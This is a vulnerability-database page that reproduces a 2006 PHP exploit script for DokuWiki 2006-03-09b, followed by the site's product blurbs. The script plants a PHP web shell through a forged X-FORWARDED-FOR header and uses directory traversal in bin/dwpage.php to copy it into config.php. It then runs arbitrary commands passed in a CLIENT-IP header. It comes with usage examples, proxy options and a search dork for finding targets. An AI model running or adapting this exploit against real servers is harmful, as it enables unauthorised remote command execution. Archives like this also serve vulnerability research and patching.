Vulners
Lucene search
DokuWiki 2006-03-09b - 'dwpage.php' Remote Code Execution
#!/usr/bin/php -q -d short_open_tag=on
<?
print_r('
--------------------------------------------------------------------------------
DokuWiki <= 2006-03-09b release /bin/dwpage.php remote commands execution xploit
by rgod [email protected]
site: http://retrogod.altervista.org
dork: "Driven by DokuWiki"
--------------------------------------------------------------------------------
');
/*
works with register_argc_argv = On
*/
if ($argc<4) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host: target server (ip/hostname)
path: path to dokuwiki
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /wiki/ ls -la -P1.1.1.1:80
php '.$argv[0].' localhost /wiki/ ls -la -p81
--------------------------------------------------------------------------------
');
die;
}
/* software site: http://wiki.splitbrain.org/wiki:dokuwiki
there are some shell scripts in /bin folder and there is no .htaccess to
protect it: most dangerous one is dwpage.php, if register_argc_argv = On
it allows to copy/move files among folders because of $TARGET_FN var
directory traversal, also you can inject a shell by main doku.php script
sending a malicious X-FORWARDED-FOR http header (but you could do the same
uploading some file in /data/media folder through /lib/exe/media.php...,
I choosed the first solution)
also, I noticed, you can disclose php configuration by
setting an http header like this calling the main doku.php
script:
X-DOKUWIKI-DO: debug
(debug feature is enabled by default...)
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
//create /data/pages/suntzu.txt.lock and inject the shell code
$data="do=edit&rev=&id=suntzu";
$packet="POST ".$p."doku.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="X-FORWARDED-FOR: <?php set_time_limit(0);echo 'my_delim';passthru(\$_SERVER['HTTP_CLIENT_IP']);die;?>\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
//copy /data/pages/suntzu.txt.lock to /data/pages/wiki/suntzu.txt
$packet="GET ".$p."bin/dwpage.php?-m+\"suntzu\"+commit+../data/pages/suntzu.txt.lock+wiki:suntzu HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);
//copy /data/pages/wiki/suntzu.txt to config.php inside main folder
$packet="GET ".$p."bin/dwpage.php?-m+\"suntzu\"+checkout+wiki:suntzu+../config.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);
//launch commands...
$packet="GET ".$p."config.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: $cmd\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"my_delim")){echo "exploit succeeded...\r\n";$temp=explode("my_delim",$html);die($temp[1]);}
else { echo "exploit failed...\r\n";}
?>
# milw0rm.com [2006-09-07]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Sep 2006 00:00Current
7.4High risk
Vulners AI Score7.4